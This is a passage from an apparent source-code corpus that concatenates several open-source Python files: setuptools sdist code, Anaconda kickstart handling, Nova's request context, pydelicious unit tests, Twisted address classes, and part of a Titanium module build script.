self.filelist.extend([os.path.join(src_dir, filename)
for filename in filenames])
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def check_readme(self):
for f in READMES:
if os.path.exists(f):
return
else:
self.warn(
"standard file not found: should have one of " +
', '.join(READMES)
)
def make_release_tree(self, base_dir, files):
orig.sdist.make_release_tree(self, base_dir, files)
# Save any egg_info command line options used to create this sdist
dest = os.path.join(base_dir, 'setup.cfg')
if hasattr(os, 'link') and os.path.exists(dest):
# unlink and re-copy, since it might be hard-linked, and
# we don't want to change the source version
os.unlink(dest)
self.copy_file('setup.cfg', dest)
self.get_finalized_command('egg_info').save_version_info(dest)
def _manifest_is_not_generated(self):
# check for special comment used in 2.7.1 and higher
if not os.path.isfile(self.manifest):
return False
with io.open(self.manifest, 'rb') as fp:
first_line = fp.readline()
return (first_line !=
'# file GENERATED by distutils, do NOT edit\n'.encode())
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
manifest = open(self.manifest, 'rbU')
for line in manifest:
# The manifest must contain UTF-8. See #303.
if six.PY3:
try:
line = line.decode('UTF-8')
except UnicodeDecodeError:
log.warn("%r not UTF-8 decodable -- skipping" % line)
continue
# ignore comments and blank lines
line = line.strip()
if line.startswith('#') or not line:
continue
self.filelist.append(line)
manifest.close()
| mit |
rhinstaller/anaconda | pyanaconda/modules/payloads/kickstart.py | 3 | 2940 | #
# Kickstart handler for packaging.
#
# Copyright (C) 2018 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pykickstart.errors import KickstartParseError
from pykickstart.parser import Packages, Group
from pykickstart.sections import PackageSection
from pykickstart.constants import KS_BROKEN_IGNORE, GROUP_DEFAULT
from pyanaconda.core.configuration.anaconda import conf
from pyanaconda.core.i18n import _
from pyanaconda.core.kickstart import KickstartSpecification, commands as COMMANDS
class AnacondaPackageSection(PackageSection):
    """The parser of the %packages kickstart section."""

    def handleHeader(self, lineno, args):
        """Process packages section header.

        Add checks based on configuration settings.

        :raises KickstartParseError: when --ignorebroken is used but the
            product configuration does not enable that feature.
        """
        super().handleHeader(lineno, args)
        # --ignorebroken sets handleBroken to KS_BROKEN_IGNORE; reject it
        # unless the product explicitly enables the feature.
        if not conf.payload.enable_ignore_broken_packages \
                and self.handler.packages.handleBroken == KS_BROKEN_IGNORE:
            raise KickstartParseError(
                _("The %packages --ignorebroken feature is not supported on your product!"),
                lineno=lineno
            )
class AnacondaPackages(Packages):
    """The representation of the %packages kickstart section."""

    def create_group(self, name, include=GROUP_DEFAULT):
        """Create a new instance of a group.

        :param name: a name of the group
        :param include: a level of inclusion
        :return: a group object
        """
        return Group(name=name, include=include)
class PayloadKickstartSpecification(KickstartSpecification):
    """Kickstart specification of the payloads module.

    Declares the kickstart commands, command data and sections this
    module handles; the mapping values come from pyanaconda's shared
    command definitions.
    """

    # Installation-source and payload-related kickstart commands.
    commands = {
        "cdrom": COMMANDS.Cdrom,
        "harddrive": COMMANDS.HardDrive,
        "hmc": COMMANDS.Hmc,
        "liveimg": COMMANDS.Liveimg,
        "module": COMMANDS.Module,
        "nfs": COMMANDS.NFS,
        "ostreesetup": COMMANDS.OSTreeSetup,
        "url": COMMANDS.Url
    }

    # Per-command data containers.
    commands_data = {
        "ModuleData": COMMANDS.ModuleData
    }

    # %packages is parsed by the product-aware section parser above.
    sections = {
        "packages": AnacondaPackageSection
    }

    sections_data = {
        "packages": AnacondaPackages
    }
| gpl-2.0 |
petrutlucian94/nova_dev | nova/context.py | 3 | 8078 | # Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of nova."""
import copy
import uuid
import six
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import local
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import policy
LOG = logging.getLogger(__name__)
def generate_request_id():
    """Build a fresh request identifier of the form ``req-<uuid4>``."""
    return 'req-%s' % uuid.uuid4()
class RequestContext(object):
    """Security context and request information.

    Represents the user taking a given action within the system.
    """

    def __init__(self, user_id, project_id, is_admin=None, read_deleted="no",
                 roles=None, remote_address=None, timestamp=None,
                 request_id=None, auth_token=None, overwrite=True,
                 quota_class=None, user_name=None, project_name=None,
                 service_catalog=None, instance_lock_checked=False, **kwargs):
        """Initialize the request context.

        :param read_deleted: 'no' indicates deleted records are hidden, 'yes'
            indicates deleted records are visible, 'only' indicates that
            *only* deleted records are visible.

        :param overwrite: Set to False to ensure that the greenthread local
            copy of the index is not overwritten.

        :param kwargs: Extra arguments that might be present, but we ignore
            because they possibly came in from older rpc messages.
        """
        if kwargs:
            LOG.warn(_('Arguments dropped when creating context: %s') %
                     str(kwargs))
        self.user_id = user_id
        self.project_id = project_id
        self.roles = roles or []
        # Goes through the validating property defined below.
        self.read_deleted = read_deleted
        self.remote_address = remote_address
        if not timestamp:
            timestamp = timeutils.utcnow()
        if isinstance(timestamp, six.string_types):
            # Timestamps arriving over RPC are serialized strings.
            timestamp = timeutils.parse_strtime(timestamp)
        self.timestamp = timestamp
        if not request_id:
            request_id = generate_request_id()
        self.request_id = request_id
        self.auth_token = auth_token
        if service_catalog:
            # Only include required parts of service_catalog
            self.service_catalog = [s for s in service_catalog
                                    if s.get('type') in ('volume',)]
        else:
            # if list is empty or none
            self.service_catalog = []
        self.instance_lock_checked = instance_lock_checked
        # NOTE(markmc): this attribute is currently only used by the
        # rs_limits turnstile pre-processor.
        # See https://lists.launchpad.net/openstack/msg12200.html
        self.quota_class = quota_class
        self.user_name = user_name
        self.project_name = project_name
        self.is_admin = is_admin
        if self.is_admin is None:
            # Derive the admin flag from policy when not given explicitly.
            self.is_admin = policy.check_is_admin(self)
        if overwrite or not hasattr(local.store, 'context'):
            self.update_store()

    def _get_read_deleted(self):
        return self._read_deleted

    def _set_read_deleted(self, read_deleted):
        # Restrict read_deleted to the three supported modes.
        if read_deleted not in ('no', 'yes', 'only'):
            raise ValueError(_("read_deleted can only be one of 'no', "
                               "'yes' or 'only', not %r") % read_deleted)
        self._read_deleted = read_deleted

    def _del_read_deleted(self):
        del self._read_deleted

    read_deleted = property(_get_read_deleted, _set_read_deleted,
                            _del_read_deleted)

    def update_store(self):
        # Publish this context to the greenthread-local store.
        local.store.context = self

    def to_dict(self):
        """Serialize the context (e.g. for RPC transport)."""
        return {'user_id': self.user_id,
                'project_id': self.project_id,
                'is_admin': self.is_admin,
                'read_deleted': self.read_deleted,
                'roles': self.roles,
                'remote_address': self.remote_address,
                'timestamp': timeutils.strtime(self.timestamp),
                'request_id': self.request_id,
                'auth_token': self.auth_token,
                'quota_class': self.quota_class,
                'user_name': self.user_name,
                'service_catalog': self.service_catalog,
                'project_name': self.project_name,
                'instance_lock_checked': self.instance_lock_checked,
                'tenant': self.tenant,
                'user': self.user}

    @classmethod
    def from_dict(cls, values):
        """Rebuild a context from :meth:`to_dict` output.

        'user' and 'tenant' are derived properties, so drop them before
        feeding the rest to the constructor.
        """
        values.pop('user', None)
        values.pop('tenant', None)
        return cls(**values)

    def elevated(self, read_deleted=None, overwrite=False):
        """Return a version of this context with admin flag set."""
        context = copy.copy(self)
        context.is_admin = True
        # NOTE(review): copy.copy is shallow, so this append also mutates
        # self.roles (the list object is shared) -- confirm intended.
        if 'admin' not in context.roles:
            context.roles.append('admin')
        if read_deleted is not None:
            context.read_deleted = read_deleted
        return context

    # NOTE(sirp): the openstack/common version of RequestContext uses
    # tenant/user whereas the Nova version uses project_id/user_id. We need
    # this shim in order to use context-aware code from openstack/common, like
    # logging, until we make the switch to using openstack/common's version of
    # RequestContext.
    @property
    def tenant(self):
        return self.project_id

    @property
    def user(self):
        return self.user_id
def get_admin_context(read_deleted="no"):
    """Build an admin RequestContext with no associated user or project.

    overwrite=False keeps the greenthread-local context untouched.
    """
    return RequestContext(user_id=None,
                          project_id=None,
                          is_admin=True,
                          read_deleted=read_deleted,
                          overwrite=False)
def is_user_context(context):
    """Return True when *context* represents a regular (non-admin) user.

    A normal user context must be truthy, must not carry the admin flag,
    and must identify both a user and a project.
    """
    if not context or context.is_admin:
        return False
    return bool(context.user_id and context.project_id)
def require_admin_context(ctxt):
    """Raise exception.AdminRequired() if the context is NOT an admin context.

    (The original docstring stated the inverse of the actual behavior.)
    """
    if not ctxt.is_admin:
        raise exception.AdminRequired()
def require_context(ctxt):
    """Raise exception.NotAuthorized() if context is not a user or an
    admin context.
    """
    if not ctxt.is_admin and not is_user_context(ctxt):
        raise exception.NotAuthorized()
def authorize_project_context(context, project_id):
    """Ensures a request has permission to access the given project."""
    # Admin contexts pass through unchecked; user contexts must carry a
    # project_id matching the requested one.
    if is_user_context(context):
        if not context.project_id:
            raise exception.NotAuthorized()
        elif context.project_id != project_id:
            raise exception.NotAuthorized()
def authorize_user_context(context, user_id):
    """Ensures a request has permission to access the given user."""
    # Mirrors authorize_project_context, keyed on user_id instead.
    if is_user_context(context):
        if not context.user_id:
            raise exception.NotAuthorized()
        elif context.user_id != user_id:
            raise exception.NotAuthorized()
def authorize_quota_class_context(context, class_name):
    """Ensures a request has permission to access the given quota class."""
    # Mirrors authorize_project_context, keyed on quota_class instead.
    if is_user_context(context):
        if not context.quota_class:
            raise exception.NotAuthorized()
        elif context.quota_class != class_name:
            raise exception.NotAuthorized()
| apache-2.0 |
dastjead/pydelicious | tests/pydelicioustest.py | 23 | 9251 | """Unittests for pydelicious module.
"""
import sys, os
import unittest
import urllib
import urllib2
import pydelicious
import time
from StringIO import StringIO
test_data = {
# old rss feeds
'http://del.icio.us/rss/': 'var/rss.xml',
'http://del.icio.us/rss/popular/': 'var/rss_popular.xml',
'http://del.icio.us/rss/tag/python': 'var/rss_tag_python.xml',
'http://del.icio.us/rss/pydelicious': 'var/rss_pydelicious.xml',
'http://del.icio.us/rss/url/efbfb246d886393d48065551434dab54': 'var/rss_url.xml',
# v2 feeds
'http://feeds.delicious.com/v2/json': 'var/feed_v2.json',
'http://feeds.delicious.com/v2/rss': 'var/feed_v2.rss',
'http://feeds.delicious.com/v2/json/recent': 'var/feed_v2_recent.json',
'http://feeds.delicious.com/v2/rss/recent': 'var/feed_v2_recent.rss.xml',
}
def fetch_file(url, fn):
    """Download *url* and cache it at path *fn*, reporting what happened."""
    data = urllib2.urlopen(url).read()
    if os.path.exists(fn):
        acted = 'Overwritten'
    else:
        acted = 'New'
    open(fn, 'w+').write(data)
    print "%s file %s for <%s>" % (acted, fn, url)
def http_request_dummy(url, user_agent=None, retry=0, opener=None):
    """Offline stand-in for pydelicious.http_request.

    Known feed URLs are served from the cached files listed in
    ``test_data`` (downloading them once if missing); any other URL is
    echoed back as the response body.
    """
    if url in test_data:
        fn = test_data[url]
        if not os.path.isfile(fn):
            fetch_file(url, fn)
        return open(fn)
    else:
        return StringIO(url)
# Turn of all HTTP fetching in pydelicious,
# don't do http requests but return pre-def data
# See blackbox tests if you want to test for real
pydelicious.http_request = http_request_dummy
def api_request_dummy(path, params='', user='', passwd='', opener=None):
    """Instead of mimicking the server responses this will return a tuple
    including the url.

    Lets the unit tests compare the URL a call would hit without any
    network traffic.
    """
    if params:
        url = "%s/%s?%s" % (pydelicious.DLCS_API, path, urllib.urlencode(params))
    else:
        url = "%s/%s" % (pydelicious.DLCS_API, path)
    return url, user, passwd
def parser_dummy(data, split_tags=False):
    """Stand-in XML parser: hand the raw payload back unparsed."""
    result = {}
    result['not-parsed'] = data
    return result
class PyDeliciousTester(unittest.TestCase):
    """Base TestCase adding a containment assertion with a clearer message."""

    def assertContains(self, container, object):
        self.failUnless(object in container, "%s not in %s" %(object, container))
class TestWaiter(PyDeliciousTester):
    """Timing behaviour of pydelicious.Waiter (the request throttle).

    NOTE: wall-clock based, so inherently flaky; currently disabled in
    __testcases__ below.
    """

    def testwait1(self):
        wt = pydelicious.DLCS_WAIT_TIME
        # First call, no wait needed
        t = time.time()
        pydelicious.Waiter()
        waited = round(time.time() - t, 1)
        self.assert_(waited < wt,
                     "unneeded wait of %s" % (waited,))
        # Some values between full wait intervals
        for w in .4, .7, 1.5:
            time.sleep(w)
            t = time.time()
            pydelicious.Waiter()
            waited = round(time.time() - t, 1)
            self.assert_(waited <= pydelicious.DLCS_WAIT_TIME,
                         "unneeded wait of %s (not %s)" % (w,
                             pydelicious.DLCS_WAIT_TIME-w))
        # Some more regular intervals
        t = time.time()
        for i in range(0, 2):
            pydelicious.Waiter()
        waited = time.time() - t
        self.assert_(waited >= i*wt,
                     "needed wait of %s, not %s" % (i*wt, waited,))
class TestGetrss(PyDeliciousTester):
    "test old RSS feed parsing"

    # def test_dlcs_rss_request(self):
    #     f = pydelicious.dlcs_rss_request
    #     pass

    def test_getrss(self):
        # Each getrss() variant should parse its canned fixture to a list.
        self.assert_(pydelicious.feedparser, "feedparser required for this test")
        p = pydelicious.getrss
        self.assertEqual(
            type(p()), type([]) )
        self.assertEqual(
            type(p(popular=1)), type([]) )
        self.assert_(
            type(p(tag="python")), type([]) )
        self.assert_(
            type(p(user="pydelicious")), type([]) )
        self.assertEqual(
            type(p(url="http://deliciouspython.python-hosting.com/")),
            type([]) )
class TestFeeds(PyDeliciousTester):
    """
    TODO: implement json/rss parsing
    """

    def test_getfeed(self):
        # getfeed('') defaults to the JSON v2 feed fixture.
        f = pydelicious.getfeed
        data = f('')
        self.assertEqual( data[:2]+data[-2:], '[{}]' )
        if pydelicious.feedparser:
            pass # TODO
        else:
            self.assert_( f('', format='rss').startswith('<?xml version="1.0" encoding="UTF-8"?>') )
        # print f('', format='json')
        # print f('recent')
        # print f('recent', format='rss')
class TestBug(PyDeliciousTester):
    """Regression tests for reported bugs."""

    def testBug2(self):
        '''testbug2: via deepak.jois@gmail.com
        missing "" in {"user":user}'''
        self.assert_(pydelicious.feedparser, "feedparser required for this test")
        self.assertEqual(
            type(pydelicious.getrss(tag="read",user="deepakjois")),
            type([]))
class DeliciousApiUnitTest(PyDeliciousTester):
    """Simply tests wether DeliciousAPI.request(`path`, `args`) results in the same URL as
    DeliciousAPI.`path`(`args`)
    """

    def setUp(self):
        # Both API instances use the dummy request/parser hooks, so no
        # network traffic happens; only URL construction is exercised.
        self.api_utf8 = pydelicious.DeliciousAPI('testUser', 'testPwd',
            'utf-8', api_request=api_request_dummy, xml_parser=parser_dummy)
        self.api_latin1 = pydelicious.DeliciousAPI('testUser', 'testPwd',
            'latin-1', api_request=api_request_dummy, xml_parser=parser_dummy)

    def test_param_encoding(self):
        # Parameters must be re-encoded to UTF-8 percent-escapes regardless
        # of the codec the API instance was created with.
        a = self.api_utf8
        params = {
            'foo': '\xe2\x98\x85',
            'bar': '\xc3\xa4'
        }
        params = a._encode_params(params, a.codec)
        self.assert_('foo=%E2%98%85' in urllib.urlencode(params))
        self.assert_('bar=%C3%A4' in urllib.urlencode(params))
        a = self.api_latin1
        params = {
            'bar': '\xe4',
            'baz': '\xa4'
        }
        params = a._encode_params(params, a.codec)
        self.assert_('bar=%C3%A4' in urllib.urlencode(params))
        self.assert_('baz=%C2%A4' in urllib.urlencode(params))

    def test_fetch_vs_methods(self):
        # Every convenience method must produce the same request as the
        # generic request() call for its path.
        a = self.api_utf8
        self.assertEqual(a.request('tags/get'), a.tags_get())
        self.assertEqual(a.request('tags/rename', old='tag1', new='tag2'), a.tags_rename('tag1', 'tag2'))
        self.assertEqual(a.request('posts/update'), a.posts_update())
        self.assertEqual(a.request('posts/dates'), a.posts_dates())
        self.assertEqual(a.request('posts/get', meta='yes'), a.posts_get())
        self.assertEqual(a.request('posts/get', meta=True), a.posts_get())
        self.assertEqual(a.request('posts/recent'), a.posts_recent())
        self.assertEqual(a.request('posts/all', meta=True), a.posts_all())
        self.assertEqual(a.request('posts/add', url='url1', description='descr1', replace='no', shared='no'), a.posts_add('url1', 'descr1', replace='no', shared='no'))
        self.assertEqual(a.request('posts/delete', url='url1'), a.posts_delete('url1'))
        self.assertEqual(a.request('tags/bundles/all'), a.bundles_all())
        self.assertEqual(a.request('tags/bundles/set', bundle='bundle1', tags='tag1 tag2'), a.bundles_set('bundle1', 'tag1 tag2'))
        self.assertEqual(a.request('tags/bundles/delete', bundle='bundle1'), a.bundles_delete('bundle1'))

    def test_fetch_raw_vs_methods(self):
        # Same equivalence as above, for the _raw (unparsed) variants.
        a = self.api_utf8
        self.assertEqual(a.request_raw('tags/get'), a.tags_get(_raw=True))
        self.assertEqual(a.request_raw('tags/rename', old='tag1', new='tag2'), a.tags_rename('tag1', 'tag2', _raw=True))
        self.assertEqual(a.request_raw('posts/update'), a.posts_update(_raw=True))
        self.assertEqual(a.request_raw('posts/dates'), a.posts_dates(_raw=True))
        self.assertEqual(a.request_raw('posts/get', meta=True), a.posts_get(_raw=True))
        self.assertEqual(a.request_raw('posts/get', meta='yes'), a.posts_get(_raw=True))
        self.assertEqual(a.request_raw('posts/recent'), a.posts_recent(_raw=True))
        self.assertEqual(a.request_raw('posts/all', meta=True), a.posts_all(_raw=True))
        self.assertEqual(a.request_raw('posts/add', url='url1', description='descr1', replace='no', shared='no'), a.posts_add('url1', 'descr1', replace='no', shared='no', _raw=True))
        self.assertEqual(a.request_raw('posts/delete', url='url1'), a.posts_delete('url1', _raw=True))
        self.assertEqual(a.request_raw('tags/bundles/all'), a.bundles_all(_raw=True))
        self.assertEqual(a.request_raw('tags/bundles/set', bundle='bundle1', tags='tag1 tag2'), a.bundles_set('bundle1', 'tag1 tag2', _raw=True))
        self.assertEqual(a.request_raw('tags/bundles/delete', bundle='bundle1'), a.bundles_delete('bundle1', _raw=True))
class DeliciousErrorTest(PyDeliciousTester):
    """DeliciousError.raiseFor must map server messages to exception types."""

    def test_raiseFor(self):
        # 'item already exists' maps to the specific subclass...
        self.assertRaises(
            pydelicious.DeliciousItemExistsError,
            pydelicious.DeliciousError.raiseFor, 'item already exists',
            'path/add', **{'url':'urn:system'});
        # ...anything unrecognized falls back to the base error.
        self.assertRaises(
            pydelicious.DeliciousError,
            pydelicious.DeliciousError.raiseFor, 'other error', 'path/get'
        );
# Suites run by unittest.main (TestWaiter is currently disabled -- slow/flaky).
__testcases__ = (TestGetrss, TestBug, TestFeeds, DeliciousApiUnitTest, DeliciousErrorTest)#TestWaiter, )

if __name__ == '__main__':
    # 'refresh_test_data' re-downloads the cached fixture files listed in
    # test_data; otherwise run the unit tests.
    if len(sys.argv)>1 and sys.argv[1] == 'refresh_test_data':
        for url, fn in test_data.items():
            if os.path.exists(fn):
                fetch_file(url, fn)
    else:
        unittest.main()
| bsd-2-clause |
mitchcapper/mythbox | resources/lib/twisted/twisted/internet/address.py | 56 | 4196 | # Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Address objects for network connections."""
import warnings, os
from zope.interface import implements
from twisted.internet.interfaces import IAddress
class IPv4Address(object):
    """
    Object representing an IPv4 socket endpoint.

    @ivar type: A string describing the type of transport, either 'TCP' or 'UDP'.
    @ivar host: A string containing the dotted-quad IP address.
    @ivar port: An integer representing the port number.
    """

    # _bwHack is given to old users who think we are a tuple. They expected
    # addr[0] to define the socket type rather than the address family, so
    # the value comes from a different namespace than the new .type value:

    #   type = map[_bwHack]
    #   map = { 'SSL': 'TCP', 'INET': 'TCP', 'INET_UDP': 'UDP' }

    implements(IAddress)

    def __init__(self, type, host, port, _bwHack = None):
        assert type in ('TCP', 'UDP')
        self.type = type
        self.host = host
        self.port = port
        self._bwHack = _bwHack

    def __getitem__(self, index):
        # Deprecated tuple emulation for legacy callers.
        warnings.warn("IPv4Address.__getitem__ is deprecated.  Use attributes instead.",
                      category=DeprecationWarning, stacklevel=2)
        return (self._bwHack or self.type, self.host, self.port).__getitem__(index)

    def __getslice__(self, start, stop):
        # Deprecated tuple emulation for legacy callers.
        warnings.warn("IPv4Address.__getitem__ is deprecated.  Use attributes instead.",
                      category=DeprecationWarning, stacklevel=2)
        return (self._bwHack or self.type, self.host, self.port)[start:stop]

    def __eq__(self, other):
        # Equal to a plain tuple (legacy form) or to another IPv4Address
        # with the same type/host/port.
        if isinstance(other, tuple):
            return tuple(self) == other
        elif isinstance(other, IPv4Address):
            a = (self.type, self.host, self.port)
            b = (other.type, other.host, other.port)
            return a == b
        return False

    def __repr__(self):
        return 'IPv4Address(%s, %r, %d)' % (self.type, self.host, self.port)
class UNIXAddress(object):
    """
    Object representing a UNIX socket endpoint.

    @ivar name: The filename associated with this socket.
    @type name: C{str}
    """

    implements(IAddress)

    def __init__(self, name, _bwHack='UNIX'):
        self.name = name
        self._bwHack = _bwHack

    def __getitem__(self, index):
        # Deprecated tuple emulation for legacy callers.
        warnings.warn("UNIXAddress.__getitem__ is deprecated.  Use attributes instead.",
                      category=DeprecationWarning, stacklevel=2)
        return (self._bwHack, self.name).__getitem__(index)

    def __getslice__(self, start, stop):
        # Deprecated tuple emulation for legacy callers.
        warnings.warn("UNIXAddress.__getitem__ is deprecated.  Use attributes instead.",
                      category=DeprecationWarning, stacklevel=2)
        return (self._bwHack, self.name)[start:stop]

    def __eq__(self, other):
        if isinstance(other, tuple):
            return tuple(self) == other
        elif isinstance(other, UNIXAddress):
            # First do the simple thing and check to see if the names are the
            # same. If not, and the paths exist, check to see if they point to
            # the same file.
            if self.name == other.name:
                return True
            else:
                try:
                    return os.path.samefile(self.name, other.name)
                except OSError:
                    pass
        return False

    def __repr__(self):
        return 'UNIXAddress(%r)' % (self.name,)
# These are for buildFactory backwards compatability due to
# stupidity-induced inconsistency.
class _ServerFactoryIPv4Address(IPv4Address):
    """Backwards compatability hack. Just like IPv4Address in practice."""

    def __eq__(self, other):
        # Legacy 2-tuple comparison (host, port) -- deprecated; otherwise
        # behaves like IPv4Address equality.
        if isinstance(other, tuple):
            warnings.warn("IPv4Address.__getitem__ is deprecated.  Use attributes instead.",
                          category=DeprecationWarning, stacklevel=2)
            return (self.host, self.port) == other
        elif isinstance(other, IPv4Address):
            a = (self.type, self.host, self.port)
            b = (other.type, other.host, other.port)
            return a == b
        return False
Lukic/Lukic.Weather | build.py | 1 | 6796 | #!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
    """Resolve the Titanium SDK path from *config*, expanding ``~`` and
    environment variables."""
    raw = config['TITANIUM_SDK']
    return os.path.expandvars(os.path.expanduser(raw))
def replace_vars(config, token):
    """Expand every ``$(KEY)`` reference in *token* using *config*.

    Expansion stops at the first malformed reference (no closing ')') or
    unknown key, leaving the rest of *token* untouched.  Replacement values
    may themselves contain ``$(...)`` references, which are expanded in turn.

    :param config: mapping of variable names to replacement strings.
    :param token: the string to expand.
    :returns: the (possibly partially) expanded string.
    """
    idx = token.find('$(')
    while idx != -1:
        idx2 = token.find(')', idx + 2)
        if idx2 == -1:
            break
        key = token[idx + 2:idx2]
        # dict.has_key() was removed in Python 3; 'in' is identical on both.
        if key not in config:
            break
        token = token.replace('$(%s)' % key, config[key])
        idx = token.find('$(')
    return token
def read_ti_xcconfig():
    """Parse ./titanium.xcconfig into a dict, expanding $(VAR) references
    against the keys read so far."""
    contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
    config = {}
    for line in contents.splitlines(False):
        line = line.strip()
        if line[0:2]=='//': continue  # xcconfig comment line
        idx = line.find('=')
        if idx > 0:
            key = line[0:idx].strip()
            value = line[idx+1:].strip()
            config[key] = replace_vars(config,value)
    return config
def generate_doc(config):
    """Render every file in ./documentation from Markdown to HTML.

    :returns: list of one-entry {filename: html} dicts, or None when the
        documentation directory is missing.
    """
    docdir = os.path.join(cwd,'documentation')
    if not os.path.exists(docdir):
        print "Couldn't find documentation file at: %s" % docdir
        return None
    try:
        # Prefer the faster markdown2 when available.
        import markdown2 as markdown
    except ImportError:
        import markdown
    documentation = []
    for file in os.listdir(docdir):
        if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
            continue
        md = open(os.path.join(docdir,file)).read()
        html = markdown.markdown(md)
        documentation.append({file:html});
    return documentation
def compile_js(manifest,config):
    """Compile the module's CommonJS asset into the native assets router
    and write the exported-symbol metadata (metadata.json)."""
    js_file = os.path.join(cwd,'assets','nu.lukic.weather.js')
    if not os.path.exists(js_file): return
    from compiler import Compiler
    try:
        import json
    except:
        import simplejson as json
    compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
    root_asset, module_assets = compiler.compile_module()
    # Objective-C snippets spliced into NuLukicWeatherModuleAssets.m below.
    root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
    module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
    from tools import splice_code
    assets_router = os.path.join(cwd,'Classes','NuLukicWeatherModuleAssets.m')
    splice_code(assets_router, 'asset', root_asset_content)
    splice_code(assets_router, 'resolve_asset', module_asset_content)
    # Generate the exports after crawling all of the available JS source
    exports = open('metadata.json','w')
    json.dump({'exports':compiler.exports }, exports)
    exports.close()
def die(msg):
    """Print *msg* and abort the build with exit status 1.

    Uses the parenthesized print form, which behaves identically for a
    single argument on Python 2 and 3 (the bare statement form is a
    SyntaxError on Python 3).
    """
    print(msg)
    sys.exit(1)
def warn(msg):
    """Print a non-fatal, [WARN]-prefixed message.

    Parenthesized print form: identical output on Python 2 and 3, whereas
    the bare statement form is a SyntaxError on Python 3.
    """
    print("[WARN] %s" % msg)
def validate_license():
    """Warn when ./LICENSE still contains the placeholder template text."""
    c = open(os.path.join(cwd,'LICENSE')).read()
    if c.find(module_license_default)!=-1:
        warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
    """Parse and sanity-check the module ``manifest`` file.

    Dies when the manifest is missing or lacks a required key; warns when a
    required key still carries its template default value.

    :returns: ``(manifest_dict, manifest_path)``
    """
    path = os.path.join(cwd, 'manifest')
    # Check existence *before* opening: the original opened the file first,
    # so a missing manifest raised IOError and this guard never fired.
    if not os.path.exists(path):
        die("missing %s" % path)
    manifest = {}
    f = open(path)
    try:
        for line in f.readlines():
            line = line.strip()
            if line[0:1] == '#':
                continue
            if line.find(':') < 0:
                continue
            # Split on the first ':' only, so values may contain colons
            # (URLs, copyright strings, ...).
            key, value = line.split(':', 1)
            manifest[key.strip()] = value.strip()
    finally:
        f.close()
    for key in required_module_keys:
        # dict.has_key() is Python 2 only; 'in' works on both.
        if key not in manifest:
            die("missing required manifest key '%s'" % key)
        if key in module_defaults:
            defvalue = module_defaults[key]
            curvalue = manifest[key]
            if curvalue == defvalue:
                warn("please update the manifest key: '%s' to a non-default value" % key)
    return manifest, path
# Names skipped when zipping the module's asset/example/platform trees.
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
    """Recursively add *dir* to zipfile *zf*, rooted under *basepath*.

    Entries in ignoreDirs/ignoreFiles and any extension listed in
    *ignoreExt* are skipped.
    NOTE(review): mutable default for ignoreExt is shared between calls;
    harmless here because it is never mutated.
    """
    if not os.path.exists(dir): return
    for root, dirs, files in os.walk(dir):
        for name in ignoreDirs:
            if name in dirs:
                dirs.remove(name)	# don't visit ignored directories
        for file in files:
            if file in ignoreFiles: continue
            e = os.path.splitext(file)
            if len(e) == 2 and e[1] in ignoreExt: continue
            from_ = os.path.join(root, file)
            to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
            zf.write(from_, to_)
def glob_libfiles():
    """Collect the per-architecture Release static libraries produced by
    xcodebuild under ./build."""
    return [libfile for libfile in glob.glob('build/**/*.a')
            if libfile.find('Release-') != -1]
def build_module(manifest,config):
    """Run xcodebuild for device and simulator, then lipo the resulting
    static libraries into one fat build/lib<moduleid>.a."""
    from tools import ensure_dev_path
    ensure_dev_path()
